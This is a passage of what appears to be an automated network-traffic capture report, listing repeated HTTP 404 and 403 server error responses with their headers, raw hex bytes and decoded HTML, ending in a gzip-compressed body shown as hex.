404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Jun 2024 12:35:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jun 2024 12:37:37 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jun 2024 12:37:39 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jun 2024 12:37:42 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jun 2024 12:37:45 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 04 Jun 2024 12:37:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cacheContent-Encoding: gzipData Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 5b 6f 13 47 14 7e 8e 7f c5 74 a3 0a 1b c5 7b b3 13 c2 7a 6d 89 a2 54 42 0d a2 52 53 f1 80 aa 6a bc 17 ef 90 dd 9d d5 ee 38 97 5a 96 48 28 01 04 34 41 25 6a 2e 95 68 43 9b 96 46 32 85 54 82 92 98 fe 99 cc ae f3 94 bf d0 d9 8b 8d 43 5a fb 61 77 ce 9e f3 7d e7 9b f9 e6 a8 1f e9 58 23 8b 9e 01 2c e2 d8 b5 9c da 7f 18 50 67 2b c7 20 10 68 16 f4 03 83 54 b9 26 31 8b 93 1c 0b 13 44 6c a3 16 75 1f 47 7b 9b c7 1b af a2 a5 3d ba b3 a9 0a 69 38 a7 06 64 91 7d ce 9d 6f 39 d0 6f 20 57 11 2b 1e d4 75 e4 36 d8 9b 86 6d ec 2b a3 e5 72 b9 9d ab 63 7d b1 65 62 97 14 03 f4 8d a1 48 65 6f a1 92 2c 4d e8 20 7b 51 e1 68 e7 c1 51 f7 7b ae 9d e3 1d 88 dc d6 3c d2 89 a5 4c 88 22 cb cb a0 25 f1 63 00 9b 04 57 58 4e 42 df aa 43 6d b6 e1 e3 a6 ab 2b 60 54 16 e1 78 09 66 a4 60 d4 34 cd 94 20 e1 03 d2 04 03 b2 0c d4 b0 88 02 ca 31 aa 8d 5c a3 78 2a 92 75 5e b4 0d 93 25 c9 71 12 a3 d2 58 97 86 4b 86 c8 8a 99 30 b3 64 5e 30 2f 56 40 06 22 4f c6 15 75 ec eb 86 af 48 de 02 d0 61 60 19 3a 18 d5 26 f4 8b f5 89 c1 c6 c4 c0 b1 04 a9 95 e6 16 eb 98 10 ec b0 1e cf d6 a4 4c b1 9a b2 28 8a a9 a0 f9 4c 45 1d db 7a 05 64 9b 03 44 f6 4f 5a 06 7d 19 03 d8 c9 54 08 91 b3 43 ea 13 c6 71 90 1c 42 06 19 23 b6 73 d8 1e 1c 66 86 09 64 99 a5 be 3f d8 38 07 d8 a8 35 bc 85 a5 44 95 2a 64 86 50 05 2b b5 55 a0 f9 c8 23 ef 8d f5 e5 cc a7 cc 58 00 e9 55 6e fa d2 d7 97 af 4d 4f 4f 5d 9e e1 40 e0 6b 55 4e 10 02 7d 96 1f 97 78 1b 0a 37 83 22 5b 14 3d 1f f3 0e 72 f9 9b 01 57 63 e0 09 18 73 65 f6 32 7d 89 47 2e 22 f9 16 d2 15 ee b3 cf e7 be c0 0d 74 1d 2d 7c 32 35 65 5d bf c2 8d 69 b3 ff 11 6d 17 86 70 62 5b d6 72 23 aa 8e e6 80 66 c3 20 a8 72 b1 fd 98 f1 47 4e 05 13 bf 71 67 af 01 ab fb 30 35 f3 4b 02 31 a2 7a 7d 58 22 71 b5 70 f9 f7 68 eb db de 8b d7 e1 cb 65 fa 66 37 fc f1 fe d1 9b 47 74 ed 5e b8 bf 4e 57 97 c3 f5 3f 4f 0e 1f d2 d7 af 7a 3b 7b e9 7d 8b 3a 3f 47 6b 2b f4 f1 46 af f3 2e ea 76 c2 07 bb e1 bd 3f 4e 0e 97 54 c1 fb 10 5d e6 6a 74 f5 45 ef 76 97 7e f7 94 6e ff 74 72 b8 35 48 c2 ec ae b3 56 46 54 1b c5 1d 84 ab 6b 47 6f 7f 61 7d d0 95 3b b4 f3 37 7d 78 87 ae ed d1 47 2f 8f 37 9f b3 60 f8 e4 80 de 3d 48 5b 54 05 56 91 a8 10 32 8c 21 39 31 e1 ee f2 51 77 bd f7 db 33 ba b2 ff bf 84 cf 6e 85 4f 7f 4d 39 53 c2 93 c3 ed 01 70 d2 13 83 49 e5 86 f7 37 98 62 b6 07 8c be b7 f4 24 da 3f 88 9e bf 3d fe e1 af b8 fa dd 36 5d 5f 39 53 1a 6e 76 8e 6f 6d a5 d5 bd ce 3f b4 b3 73 aa 3a 19 5a 83 4d 1c ae ee 2b 52 85 f4 04 b3 a7 2a a4 86 e8 fb 2b 07 06 3f 36 15 67 90 63 e0 26 c9 9b 4d 57 23 08 bb f9 